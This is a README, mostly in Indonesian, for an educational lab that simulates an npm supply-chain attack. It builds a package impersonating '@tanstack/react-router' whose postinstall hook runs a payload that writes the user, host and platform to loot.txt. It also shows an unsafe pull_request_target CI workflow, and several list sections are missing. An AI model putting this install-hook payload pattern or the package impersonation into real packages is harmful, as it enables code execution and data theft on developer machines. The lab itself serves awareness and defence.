
Educational Lab for Understanding npm Supply Chain Attacks, CI/CD Abuse, and Install-Time Code Execution
Project ini dibuat hanya untuk:
Jangan gunakan project ini untuk:
Lab ini mensimulasikan konsep dasar dari insiden:
Simulasi dilakukan secara lokal dan aman tanpa:
lab/
├── fake-repo/ # Simulasi repository target
├── attacker-package/ # Simulasi package malicious
└── victim-project/ # Simulasi korban
Attacker Package
↓
npm install
↓
postinstall script berjalan
↓
payload.js dieksekusi otomatis
↓
Korban terkena install-time execution
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git
cd CVE-2026-45321-Tanstack
cd attacker-package
npm install
npm pack
Hasil:
tanstack-react-router-1.169.5.tgz
cd ../victim-project
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts
Jika berhasil maka akan muncul:
=== MALICIOUS PAYLOAD EXECUTED ===
dan file:
loot.txt
akan dibuat secara otomatis.
const os = require('os');
const fs = require('fs');
console.log("=== MALICIOUS PAYLOAD EXECUTED ===");
const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;
console.log(info);
fs.writeFileSync("loot.txt", info);
{
"name": "@tanstack/react-router",
"version": "1.169.5",
"scripts": {
"postinstall": "node payload.js"
}
}
Project ini juga dapat digunakan untuk memahami:
Contoh workflow:
name: CI
on:
pull_request_target:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npm install
| Simulasi Lab | Dunia Nyata |
|---|---|
| attacker-package | compromised TanStack package |
| payload.js | malicious installer |
| postinstall |
Lab ini dibuat untuk meningkatkan awareness mengenai:
| lifecycle hook abuse |
| victim-project | developer/CI korban |
| fake-repo | GitHub Actions pipeline |